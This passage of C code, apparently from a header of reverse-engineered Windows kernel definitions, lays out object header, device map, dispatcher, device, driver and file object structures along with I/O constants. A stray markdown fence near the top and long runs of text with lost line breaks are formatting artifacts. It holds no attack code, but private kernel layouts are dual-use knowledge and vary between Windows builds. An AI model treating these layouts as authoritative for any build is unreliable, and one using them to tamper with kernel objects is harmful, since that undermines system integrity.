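size_t ob_locate_name_info(const uint8_t *image, size_t image_size, size_t header_off)
{
    if (header_off > image_size || image_size - header_off <= OBJECT_HEADER_INFOMASK_OFFSET)
        return SIZE_MAX;
    uint8_t info_mask = image[header_off + OBJECT_HEADER_INFOMASK_OFFSET];
    size_t back = ob_optional_header_offset(info_mask, OB_INFOMASK_NAME);
    if (back == 0 || back > header_off)
        return SIZE_MAX;
    return header_off - back;
}
```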
//
typedef struct _OBJECT_HEADER_X {
    LONG_PTR PointerCount;
    union {
        LONG_PTR HandleCount;
        PVOID NextToFree;
    };
    EX_PUSH_LOCK Lock;
    UCHAR TypeIndex;
    union {
        UCHAR TraceFlags;
        struct {
            UCHAR DbgRefTrace : 1;
            UCHAR DbgTracePermanent : 1;
        };
    };
    UCHAR InfoMask;
    union {
        UCHAR Flags;
        struct {
            UCHAR NewObject : 1;
            UCHAR KernelObject : 1;
            UCHAR KernelOnlyAccess : 1;
            UCHAR ExclusiveObject : 1;
            UCHAR PermanentObject : 1;
            UCHAR DefaultSecurityQuota : 1;
            UCHAR SingleHandleEntry : 1;
            UCHAR DeletedInline : 1;
        };
    };
    ULONG Reserved;
    union {
        POBJECT_CREATE_INFORMATION ObjectCreateInfo;
        PVOID QuotaBlockCharged;
    };
    PVOID SecurityDescriptor;
    QUAD Body;
} OBJECT_HEADER_X, *POBJECT_HEADER_X;

#define OBJECT_TO_OBJECT_HEADER(obj) \
    CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )

#define DOSDEVICE_DRIVE_UNKNOWN 0
#define DOSDEVICE_DRIVE_CALCULATE 1 // e.g. symlink
#define DOSDEVICE_DRIVE_REMOVABLE 2
#define DOSDEVICE_DRIVE_FIXED 3
#define DOSDEVICE_DRIVE_REMOTE 4
#define DOSDEVICE_DRIVE_CDROM 5
#define DOSDEVICE_DRIVE_RAMDISK 6

typedef struct _DEVICE_MAP_V1 {
    OBJECT_DIRECTORY* DosDevicesDirectory;
    OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
    PVOID DosDevicesDirectoryHandle;
    ULONG ReferenceCount;
    ULONG DriveMap;
    UCHAR DriveType[32];
} DEVICE_MAP_V1, *PDEVICE_MAP_V1;

typedef struct _DEVICE_MAP_V1 DEVICE_MAP_COMPATIBLE;
typedef struct _DEVICE_MAP_V1* PDEVICE_MAP_COMPATIBLE;

// Since REDSTONE1 (14393)
typedef struct _DEVICE_MAP_V2 {
    OBJECT_DIRECTORY* DosDevicesDirectory;
    OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
    PVOID DosDevicesDirectoryHandle;
    volatile LONG ReferenceCount;
    ULONG DriveMap;
    UCHAR DriveType[32];
    PEJOB ServerSilo;
} DEVICE_MAP_V2, *PDEVICE_MAP_V2;

// Since W11 (22000)
typedef struct _DEVICE_MAP_V3 {
    OBJECT_DIRECTORY* DosDevicesDirectory;
    OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
    PEJOB ServerSilo;
    struct _DEVICE_MAP* GlobalDeviceMap;
    EX_FAST_REF DriveObject[26];
    LONGLONG ReferenceCount;
    PVOID DosDevicesDirectoryHandle;
    ULONG DriveMap;
    UCHAR DriveType[32];
} DEVICE_MAP_V3, *PDEVICE_MAP_V3; // pointer typedef needs the '*'

/*
** OBJECT MANAGER END
*/

/*
* WDM START
*/

#define TIMER_TOLERABLE_DELAY_BITS 6
#define TIMER_EXPIRED_INDEX_BITS 6
#define TIMER_PROCESSOR_INDEX_BITS 5

typedef struct _DISPATCHER_HEADER {
    union {
        union {
            volatile LONG Lock;
            LONG LockNV;
        } DUMMYUNIONNAME;

        struct { // Events, Semaphores, Gates, etc.
            UCHAR Type; // All (accessible via KOBJECT_TYPE)
            UCHAR Signalling;
            UCHAR Size;
            UCHAR Reserved1;
        } DUMMYSTRUCTNAME;

        struct { // Timer
            UCHAR TimerType;
            union {
                UCHAR TimerControlFlags;
                struct {
                    UCHAR Absolute : 1;
                    UCHAR Wake : 1;
                    UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;
                } DUMMYSTRUCTNAME;
            };
            UCHAR Hand;
            union {
                UCHAR TimerMiscFlags;
                struct {
#if !defined(KENCODED_TIMER_PROCESSOR)
                    UCHAR Index : TIMER_EXPIRED_INDEX_BITS;
#else
                    UCHAR Index : 1;
                    UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;
#endif
                    UCHAR Inserted : 1;
                    volatile UCHAR Expired : 1;
                } DUMMYSTRUCTNAME;
            } DUMMYUNIONNAME;
        } DUMMYSTRUCTNAME2;

        struct { // Timer2
            UCHAR Timer2Type;
            union {
                UCHAR Timer2Flags;
                struct {
                    UCHAR Timer2Inserted : 1;
                    UCHAR Timer2Expiring : 1;
                    UCHAR Timer2CancelPending : 1;
                    UCHAR Timer2SetPending : 1;
                    UCHAR Timer2Running : 1;
                    UCHAR Timer2Disabled : 1;
                    UCHAR Timer2ReservedFlags : 2;
                } DUMMYSTRUCTNAME;
            } DUMMYUNIONNAME;
            UCHAR Timer2Reserved1;
            UCHAR Timer2Reserved2;
        } DUMMYSTRUCTNAME3;

        struct { // Queue
            UCHAR QueueType;
            union {
                UCHAR QueueControlFlags;
                struct {
                    UCHAR Abandoned : 1;
                    UCHAR DisableIncrement : 1;
                    UCHAR QueueReservedControlFlags : 6;
                } DUMMYSTRUCTNAME;
            } DUMMYUNIONNAME;
            UCHAR QueueSize;
            UCHAR QueueReserved;
        } DUMMYSTRUCTNAME4;

        struct { // Thread
            UCHAR ThreadType;
            UCHAR ThreadReserved;
            union {
                UCHAR ThreadControlFlags;
                struct {
                    UCHAR CycleProfiling : 1;
                    UCHAR CounterProfiling : 1;
                    UCHAR GroupScheduling : 1;
                    UCHAR AffinitySet : 1;
                    UCHAR ThreadReservedControlFlags : 4;
                } DUMMYSTRUCTNAME;
            } DUMMYUNIONNAME;
            union {
                UCHAR DebugActive;
#if !defined(_X86_)
                struct {
                    BOOLEAN ActiveDR7 : 1;
                    BOOLEAN Instrumented : 1;
                    BOOLEAN Minimal : 1;
                    BOOLEAN Reserved4 : 3;
BOOLEAN UmsScheduled : 1; BOOLEAN UmsPrimary : 1; } DUMMYSTRUCTNAME; #endif } DUMMYUNIONNAME2; } DUMMYSTRUCTNAME5; struct { // Mutant UCHAR MutantType; UCHAR MutantSize; BOOLEAN DpcActive; UCHAR MutantReserved; } DUMMYSTRUCTNAME6; } DUMMYUNIONNAME; LONG SignalState; // Object lock LIST_ENTRY WaitListHead; // Object lock } DISPATCHER_HEADER, *PDISPATCHER_HEADER; typedef struct _KEVENT { DISPATCHER_HEADER Header; } KEVENT, *PKEVENT, *PRKEVENT; typedef struct _FAST_MUTEX { LONG_PTR Count; void *Owner; ULONG Contention; struct _KEVENT Event; ULONG OldIrql; LONG __PADDING__[1]; } FAST_MUTEX, *PFAST_MUTEX; typedef struct _KMUTANT { DISPATCHER_HEADER Header; LIST_ENTRY MutantListEntry; struct _KTHREAD *OwnerThread; BOOLEAN Abandoned; UCHAR ApcDisable; } KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX; typedef struct _KSEMAPHORE { DISPATCHER_HEADER Header; LONG Limit; } KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE; typedef struct _KTIMER { DISPATCHER_HEADER Header; ULARGE_INTEGER DueTime; LIST_ENTRY TimerListEntry; struct _KDPC *Dpc; ULONG Processor; LONG Period; } KTIMER, *PKTIMER, *PRKTIMER; typedef struct _KDEVICE_QUEUE_ENTRY { LIST_ENTRY DeviceListEntry; ULONG SortKey; BOOLEAN Inserted; } KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY; typedef enum _KDPC_IMPORTANCE { LowImportance, MediumImportance, HighImportance } KDPC_IMPORTANCE; typedef struct _KDPC { union { ULONG TargetInfoAsUlong; struct { UCHAR Type; UCHAR Importance; volatile USHORT Number; } DUMMYSTRUCTNAME; } DUMMYUNIONNAME; SINGLE_LIST_ENTRY DpcListEntry; KAFFINITY ProcessorHistory; PVOID DeferredRoutine; PVOID DeferredContext; PVOID SystemArgument1; PVOID SystemArgument2; __volatile PVOID DpcData; } KDPC, *PKDPC, *PRKDPC; typedef struct _WAIT_CONTEXT_BLOCK { union { KDEVICE_QUEUE_ENTRY WaitQueueEntry; struct { LIST_ENTRY DmaWaitEntry; ULONG NumberOfChannels; ULONG SyncCallback : 1; ULONG DmaContext : 1; ULONG Reserved : 30; }; }; PVOID DeviceRoutine; PVOID DeviceContext; ULONG 
NumberOfMapRegisters; PVOID DeviceObject; PVOID CurrentIrp; PKDPC BufferChainingDpc; } WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK; #define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters typedef struct _VPB { CSHORT Type; CSHORT Size; USHORT Flags; USHORT VolumeLabelLength; // in bytes struct _DEVICE_OBJECT *DeviceObject; struct _DEVICE_OBJECT *RealDevice; ULONG SerialNumber; ULONG ReferenceCount; WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)]; } VPB, *PVPB; typedef struct _KQUEUE { DISPATCHER_HEADER Header; LIST_ENTRY EntryListHead; ULONG CurrentCount; ULONG MaximumCount; LIST_ENTRY ThreadListHead; } KQUEUE, *PKQUEUE; typedef struct _KDEVICE_QUEUE { CSHORT Type; CSHORT Size; LIST_ENTRY DeviceListHead; KSPIN_LOCK Lock; #if defined(_AMD64_) union { BOOLEAN Busy; struct { LONG64 Reserved : 8; LONG64 Hint : 56; }; }; #else BOOLEAN Busy; #endif } KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE; enum _KOBJECTS { EventNotificationObject = 0x0, EventSynchronizationObject = 0x1, MutantObject = 0x2, ProcessObject = 0x3, QueueObject = 0x4, SemaphoreObject = 0x5, ThreadObject = 0x6, GateObject = 0x7, TimerNotificationObject = 0x8, TimerSynchronizationObject = 0x9, Spare2Object = 0xa, Spare3Object = 0xb, Spare4Object = 0xc, Spare5Object = 0xd, Spare6Object = 0xe, Spare7Object = 0xf, Spare8Object = 0x10, Spare9Object = 0x11, ApcObject = 0x12, DpcObject = 0x13, DeviceQueueObject = 0x14, EventPairObject = 0x15, InterruptObject = 0x16, ProfileObject = 0x17, ThreadedDpcObject = 0x18, MaximumKernelObject = 0x19, }; #define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm #define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm #define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm #define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm #define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm #define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs #define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm #define 
DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs #define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs #define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs #define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm #define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm #define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm #define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm #define DO_POWER_NOOP 0x00008000 #define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs #define DO_XIP 0x00020000 #define DO_DEVICE_TO_BE_RESET 0x04000000 #define DO_DAX_VOLUME 0x10000000 #define FILE_REMOVABLE_MEDIA 0x00000001 #define FILE_READ_ONLY_DEVICE 0x00000002 #define FILE_FLOPPY_DISKETTE 0x00000004 #define FILE_WRITE_ONCE_MEDIA 0x00000008 #define FILE_REMOTE_DEVICE 0x00000010 #define FILE_DEVICE_IS_MOUNTED 0x00000020 #define FILE_VIRTUAL_VOLUME 0x00000040 #define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080 #define FILE_DEVICE_SECURE_OPEN 0x00000100 #define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800 #define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000 #define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000 #define FILE_CHARACTERISTIC_CSV 0x00010000 #define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000 #define FILE_PORTABLE_DEVICE 0x00040000 #define FILE_DEVICE_BEEP 0x00000001 #define FILE_DEVICE_CD_ROM 0x00000002 #define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003 #define FILE_DEVICE_CONTROLLER 0x00000004 #define FILE_DEVICE_DATALINK 0x00000005 #define FILE_DEVICE_DFS 0x00000006 #define FILE_DEVICE_DISK 0x00000007 #define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008 #define FILE_DEVICE_FILE_SYSTEM 0x00000009 #define FILE_DEVICE_INPORT_PORT 0x0000000a #define FILE_DEVICE_KEYBOARD 0x0000000b #define FILE_DEVICE_MAILSLOT 0x0000000c #define FILE_DEVICE_MIDI_IN 0x0000000d #define FILE_DEVICE_MIDI_OUT 0x0000000e #define FILE_DEVICE_MOUSE 0x0000000f #define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010 #define FILE_DEVICE_NAMED_PIPE 
0x00000011 #define FILE_DEVICE_NETWORK 0x00000012 #define FILE_DEVICE_NETWORK_BROWSER 0x00000013 #define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014 #define FILE_DEVICE_NULL 0x00000015 #define FILE_DEVICE_PARALLEL_PORT 0x00000016 #define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017 #define FILE_DEVICE_PRINTER 0x00000018 #define FILE_DEVICE_SCANNER 0x00000019 #define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a #define FILE_DEVICE_SERIAL_PORT 0x0000001b #define FILE_DEVICE_SCREEN 0x0000001c #define FILE_DEVICE_SOUND 0x0000001d #define FILE_DEVICE_STREAMS 0x0000001e #define FILE_DEVICE_TAPE 0x0000001f #define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020 #define FILE_DEVICE_TRANSPORT 0x00000021 #define FILE_DEVICE_UNKNOWN 0x00000022 #define FILE_DEVICE_VIDEO 0x00000023 #define FILE_DEVICE_VIRTUAL_DISK 0x00000024 #define FILE_DEVICE_WAVE_IN 0x00000025 #define FILE_DEVICE_WAVE_OUT 0x00000026 #define FILE_DEVICE_8042_PORT 0x00000027 #define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028 #define FILE_DEVICE_BATTERY 0x00000029 #define FILE_DEVICE_BUS_EXTENDER 0x0000002a #define FILE_DEVICE_MODEM 0x0000002b #define FILE_DEVICE_VDM 0x0000002c #define FILE_DEVICE_MASS_STORAGE 0x0000002d #define FILE_DEVICE_SMB 0x0000002e #define FILE_DEVICE_KS 0x0000002f #define FILE_DEVICE_CHANGER 0x00000030 #define FILE_DEVICE_SMARTCARD 0x00000031 #define FILE_DEVICE_ACPI 0x00000032 #define FILE_DEVICE_DVD 0x00000033 #define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034 #define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035 #define FILE_DEVICE_DFS_VOLUME 0x00000036 #define FILE_DEVICE_SERENUM 0x00000037 #define FILE_DEVICE_TERMSRV 0x00000038 #define FILE_DEVICE_KSEC 0x00000039 #define FILE_DEVICE_FIPS 0x0000003A #define FILE_DEVICE_INFINIBAND 0x0000003B #define FILE_DEVICE_VMBUS 0x0000003E #define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F #define FILE_DEVICE_WPD 0x00000040 #define FILE_DEVICE_BLUETOOTH 0x00000041 #define FILE_DEVICE_MT_COMPOSITE 0x00000042 #define FILE_DEVICE_MT_TRANSPORT 0x00000043 #define 
FILE_DEVICE_BIOMETRIC 0x00000044 #define FILE_DEVICE_PMI 0x00000045 #define FILE_DEVICE_EHSTOR 0x00000046 #define FILE_DEVICE_DEVAPI 0x00000047 #define FILE_DEVICE_GPIO 0x00000048 #define FILE_DEVICE_USBEX 0x00000049 #define FILE_DEVICE_CONSOLE 0x00000050 #define FILE_DEVICE_NFP 0x00000051 #define FILE_DEVICE_SYSENV 0x00000052 #define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053 #define FILE_DEVICE_POINT_OF_SERVICE 0x00000054 #define FILE_DEVICE_STORAGE_REPLICATION 0x00000055 #define FILE_DEVICE_TRUST_ENV 0x00000056 #define FILE_DEVICE_UCM 0x00000057 #define FILE_DEVICE_UCMTCPCI 0x00000058 #define FILE_DEVICE_PERSISTENT_MEMORY 0x00000059 #define FILE_DEVICE_NVDIMM 0x0000005a #define FILE_DEVICE_HOLOGRAPHIC 0x0000005b #define FILE_DEVICE_SDFXHCI 0x0000005c #define FILE_DEVICE_UCMUCSI 0x0000005d #define FILE_BYTE_ALIGNMENT 0x00000000 #define FILE_WORD_ALIGNMENT 0x00000001 #define FILE_LONG_ALIGNMENT 0x00000003 #define FILE_QUAD_ALIGNMENT 0x00000007 #define FILE_OCTA_ALIGNMENT 0x0000000f #define FILE_32_BYTE_ALIGNMENT 0x0000001f #define FILE_64_BYTE_ALIGNMENT 0x0000003f #define FILE_128_BYTE_ALIGNMENT 0x0000007f #define FILE_256_BYTE_ALIGNMENT 0x000000ff #define FILE_512_BYTE_ALIGNMENT 0x000001ff #define DPC_NORMAL 0 #define DPC_THREADED 1 #if _MSC_VER >= 1200 #pragma warning(push) #pragma warning(disable:4324) // structure was padded due to __declspec(align()) #endif typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _DEVICE_OBJECT { CSHORT Type; USHORT Size; LONG ReferenceCount; struct _DRIVER_OBJECT* DriverObject; struct _DEVICE_OBJECT* NextDevice; struct _DEVICE_OBJECT* AttachedDevice; struct _IRP* CurrentIrp; PIO_TIMER Timer; ULONG Flags; // See above: DO_... ULONG Characteristics; // See ntioapi: FILE_... 
__volatile PVPB Vpb; PVOID DeviceExtension; DEVICE_TYPE DeviceType; CCHAR StackSize; union { LIST_ENTRY ListEntry; WAIT_CONTEXT_BLOCK Wcb; } Queue; ULONG AlignmentRequirement; KDEVICE_QUEUE DeviceQueue; KDPC Dpc; // // The following field is for exclusive use by the filesystem to keep // track of the number of Fsp threads currently using the device // ULONG ActiveThreadCount; PSECURITY_DESCRIPTOR SecurityDescriptor; KEVENT DeviceLock; USHORT SectorSize; USHORT Spare1; struct _DEVOBJ_EXTENSION* DeviceObjectExtension; PVOID Reserved; } DEVICE_OBJECT; typedef struct _DEVICE_OBJECT* PDEVICE_OBJECT; #if _MSC_VER >= 1200 #pragma warning(pop) #endif typedef struct _DEVOBJ_EXTENSION { CSHORT Type; USHORT Size; // // Public part of the DeviceObjectExtension structure // PDEVICE_OBJECT DeviceObject; // owning device object // end_ntddk end_nthal end_ntifs end_wdm end_ntosp // // Universal Power Data - all device objects must have this // ULONG PowerFlags; // see ntos\po\pop.h // WARNING: Access via PO macros // and with PO locking rules ONLY. // // Pointer to the non-universal power data // Power data that only some device objects need is stored in the // device object power extension -> DOPE // see po.h // struct _DEVICE_OBJECT_POWER_EXTENSION *Dope; // // power state information // // // Device object extension flags. Protected by the IopDatabaseLock. // ULONG ExtensionFlags; // // PnP manager fields // PVOID DeviceNode; // // AttachedTo is a pointer to the device object that this device // object is attached to. The attachment chain is now doubly // linked: this pointer and DeviceObject->AttachedDevice provide the // linkage. // PDEVICE_OBJECT AttachedTo; // // The next two fields are used to prevent recursion in IoStartNextPacket // interfaces. // LONG StartIoCount; // Used to keep track of number of pending start ios. LONG StartIoKey; // Next startio key ULONG StartIoFlags; // Start Io Flags. 
Need a separate flag so that it can be accessed without locks PVPB Vpb; // If not NULL contains the VPB of the mounted volume. // Set in the filesystem's volume device object. // This is a reverse VPB pointer. // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp } DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION; typedef struct _FAST_IO_DISPATCH { ULONG SizeOfFastIoDispatch; PVOID FastIoCheckIfPossible; PVOID FastIoRead; PVOID FastIoWrite; PVOID FastIoQueryBasicInfo; PVOID FastIoQueryStandardInfo; PVOID FastIoLock; PVOID FastIoUnlockSingle; PVOID FastIoUnlockAll; PVOID FastIoUnlockAllByKey; PVOID FastIoDeviceControl; PVOID AcquireFileForNtCreateSection; PVOID ReleaseFileForNtCreateSection; PVOID FastIoDetachDevice; PVOID FastIoQueryNetworkOpenInfo; PVOID AcquireForModWrite; PVOID MdlRead; PVOID MdlReadComplete; PVOID PrepareMdlWrite; PVOID MdlWriteComplete; PVOID FastIoReadCompressed; PVOID FastIoWriteCompressed; PVOID MdlReadCompleteCompressed; PVOID MdlWriteCompleteCompressed; PVOID FastIoQueryOpen; PVOID ReleaseForModWrite; PVOID AcquireForCcFlush; PVOID ReleaseForCcFlush; } FAST_IO_DISPATCH, *PFAST_IO_DISPATCH; #define IO_TYPE_ADAPTER 0x00000001 #define IO_TYPE_CONTROLLER 0x00000002 #define IO_TYPE_DEVICE 0x00000003 #define IO_TYPE_DRIVER 0x00000004 #define IO_TYPE_FILE 0x00000005 #define IO_TYPE_IRP 0x00000006 #define IO_TYPE_MASTER_ADAPTER 0x00000007 #define IO_TYPE_OPEN_PACKET 0x00000008 #define IO_TYPE_TIMER 0x00000009 #define IO_TYPE_VPB 0x0000000a #define IO_TYPE_ERROR_LOG 0x0000000b #define IO_TYPE_ERROR_MESSAGE 0x0000000c #define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d #define IRP_MJ_CREATE 0x00 #define IRP_MJ_CREATE_NAMED_PIPE 0x01 #define IRP_MJ_CLOSE 0x02 #define IRP_MJ_READ 0x03 #define IRP_MJ_WRITE 0x04 #define IRP_MJ_QUERY_INFORMATION 0x05 #define IRP_MJ_SET_INFORMATION 0x06 #define IRP_MJ_QUERY_EA 0x07 #define IRP_MJ_SET_EA 0x08 #define IRP_MJ_FLUSH_BUFFERS 0x09 #define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a #define IRP_MJ_SET_VOLUME_INFORMATION 
0x0b #define IRP_MJ_DIRECTORY_CONTROL 0x0c #define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d #define IRP_MJ_DEVICE_CONTROL 0x0e #define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f #define IRP_MJ_SHUTDOWN 0x10 #define IRP_MJ_LOCK_CONTROL 0x11 #define IRP_MJ_CLEANUP 0x12 #define IRP_MJ_CREATE_MAILSLOT 0x13 #define IRP_MJ_QUERY_SECURITY 0x14 #define IRP_MJ_SET_SECURITY 0x15 #define IRP_MJ_POWER 0x16 #define IRP_MJ_SYSTEM_CONTROL 0x17 #define IRP_MJ_DEVICE_CHANGE 0x18 #define IRP_MJ_QUERY_QUOTA 0x19 #define IRP_MJ_SET_QUOTA 0x1a #define IRP_MJ_PNP 0x1b #define IRP_MJ_PNP_POWER IRP_MJ_PNP #define IRP_MJ_MAXIMUM_FUNCTION 0x1b // Public structure typedef struct _DRIVER_EXTENSION { // // Back pointer to Driver Object // struct _DRIVER_OBJECT *DriverObject; // // The AddDevice entry point is called by the Plug & Play manager // to inform the driver when a new device instance arrives that this // driver must control. // PVOID AddDevice; // // The count field is used to count the number of times the driver has // had its registered reinitialization routine invoked. // ULONG Count; // // The service name field is used by the pnp manager to determine // where the driver related info is stored in the registry. 
// UNICODE_STRING ServiceKeyName; } DRIVER_EXTENSION, *PDRIVER_EXTENSION; // Private, since 7.1 typedef struct _DRIVER_EXTENSION_V2 { struct _DRIVER_OBJECT* DriverObject; PVOID AddDevice; ULONG Count; UNICODE_STRING ServiceKeyName; struct _IO_CLIENT_EXTENSION* ClientDriverExtension; struct _FS_FILTER_CALLBACKS* FsFilterCallbacks; } DRIVER_EXTENSION_V2, * PDRIVER_EXTENSION_V2; // Private, since 8.0 typedef struct _DRIVER_EXTENSION_V3 { struct _DRIVER_OBJECT* DriverObject; PVOID AddDevice; ULONG Count; UNICODE_STRING ServiceKeyName; struct _IO_CLIENT_EXTENSION* ClientDriverExtension; struct _FS_FILTER_CALLBACKS* FsFilterCallbacks; PVOID KseCallbacks; //KernelShimEngine PVOID DvCallbacks; //DriverVerifier } DRIVER_EXTENSION_V3, * PDRIVER_EXTENSION_V3; // Private, since 8.1 typedef struct _DRIVER_EXTENSION_V4 { struct _DRIVER_OBJECT* DriverObject; PVOID AddDevice; ULONG Count; UNICODE_STRING ServiceKeyName; struct _IO_CLIENT_EXTENSION* ClientDriverExtension; struct _FS_FILTER_CALLBACKS* FsFilterCallbacks; PVOID KseCallbacks; //KernelShimEngine PVOID DvCallbacks; //DriverVerifier PVOID VerifierContext; } DRIVER_EXTENSION_V4, * PDRIVER_EXTENSION_V4; // Private, since 11 25XXX typedef struct _DRIVER_EXTENSION_V5 { struct _DRIVER_OBJECT* DriverObject; PVOID AddDevice; ULONG Count; UNICODE_STRING ServiceKeyName; struct _IO_CLIENT_EXTENSION* ClientDriverExtension; struct _FS_FILTER_CALLBACKS* FsFilterCallbacks; PVOID KseCallbacks; //KernelShimEngine PVOID DvCallbacks; //DriverVerifier PVOID VerifierContext; struct _DRIVER_PROXY_EXTENSION* DriverProxyExtension; } DRIVER_EXTENSION_V5, * PDRIVER_EXTENSION_V5; /* size: 0x0058 */ #define DRVO_UNLOAD_INVOKED 0x00000001 #define DRVO_LEGACY_DRIVER 0x00000002 #define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr #define DRVO_REINIT_REGISTERED 0x00000008 #define DRVO_INITIALIZED 0x00000010 #define DRVO_BOOTREINIT_REGISTERED 0x00000020 #define DRVO_LEGACY_RESOURCES 0x00000040 // end_ntddk end_nthal end_ntifs 
end_ntosp #define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack. // begin_ntddk begin_nthal begin_ntifs begin_ntosp typedef struct _DRIVER_OBJECT { CSHORT Type; CSHORT Size; // // The following links all of the devices created by a single driver // together on a list, and the Flags word provides an extensible flag // location for driver objects. // PDEVICE_OBJECT DeviceObject; ULONG Flags; // // The following section describes where the driver is loaded. The count // field is used to count the number of times the driver has had its // registered reinitialization routine invoked. // PVOID DriverStart; ULONG DriverSize; PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY PDRIVER_EXTENSION DriverExtension; // // The driver name field is used by the error log thread // determine the name of the driver that an I/O request is/was bound. // UNICODE_STRING DriverName; // // The following section is for registry support. Thise is a pointer // to the path to the hardware information in the registry // PUNICODE_STRING HardwareDatabase; // // The following section contains the optional pointer to an array of // alternate entry points to a driver for "fast I/O" support. Fast I/O // is performed by invoking the driver routine directly with separate // parameters, rather than using the standard IRP call mechanism. Note // that these functions may only be used for synchronous I/O, and when // the file is cached. // PFAST_IO_DISPATCH FastIoDispatch; // // The following section describes the entry points to this particular // driver. Note that the major function dispatch table must be the last // field in the object so that it remains extensible. 
// PVOID DriverInit; PVOID DriverStartIo; PVOID DriverUnload; PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1]; } DRIVER_OBJECT; typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT; // // The following structure is pointed to by the SectionObject pointer field // of a file object, and is allocated by the various NT file systems. // typedef struct _SECTION_OBJECT_POINTERS { PVOID DataSectionObject; PVOID SharedCacheMap; PVOID ImageSectionObject; } SECTION_OBJECT_POINTERS; typedef SECTION_OBJECT_POINTERS* PSECTION_OBJECT_POINTERS; // // Define the format of a completion message. // typedef struct _IO_COMPLETION_CONTEXT { PVOID Port; PVOID Key; } IO_COMPLETION_CONTEXT, * PIO_COMPLETION_CONTEXT; typedef struct _FILE_OBJECT { CSHORT Type; CSHORT Size; PDEVICE_OBJECT DeviceObject; PVPB Vpb; PVOID FsContext; PVOID FsContext2; PSECTION_OBJECT_POINTERS SectionObjectPointer; PVOID PrivateCacheMap; NTSTATUS FinalStatus; struct _FILE_OBJECT* RelatedFileObject; BOOLEAN LockOperation; BOOLEAN DeletePending; BOOLEAN ReadAccess; BOOLEAN WriteAccess; BOOLEAN DeleteAccess; BOOLEAN SharedRead; BOOLEAN SharedWrite; BOOLEAN SharedDelete; ULONG Flags; UNICODE_STRING FileName; LARGE_INTEGER CurrentByteOffset; __volatile ULONG Waiters; __volatile ULONG Busy; PVOID LastLock; KEVENT Lock; KEVENT Event; __volatile PIO_COMPLETION_CONTEXT CompletionContext; KSPIN_LOCK IrpListLock; LIST_ENTRY IrpList; __volatile PVOID FileObjectExtension; } FILE_OBJECT; typedef struct _FILE_OBJECT* PFILE_OBJECT; typedef ULONG_PTR ERESOURCE_THREAD; typedef ERESOURCE_THREAD* PERESOURCE_THREAD; typedef struct _OWNER_ENTRY { ERESOURCE_THREAD OwnerThread; union { LONG OwnerCount; ULONG TableSize; }; } OWNER_ENTRY, *POWNER_ENTRY; typedef struct _ERESOURCE { LIST_ENTRY SystemResourcesList; POWNER_ENTRY OwnerTable; SHORT ActiveCount; USHORT Flag; PKSEMAPHORE SharedWaiters; PKEVENT ExclusiveWaiters; OWNER_ENTRY OwnerThreads[2]; ULONG ContentionCount; USHORT NumberOfSharedWaiters; USHORT NumberOfExclusiveWaiters; union { PVOID 
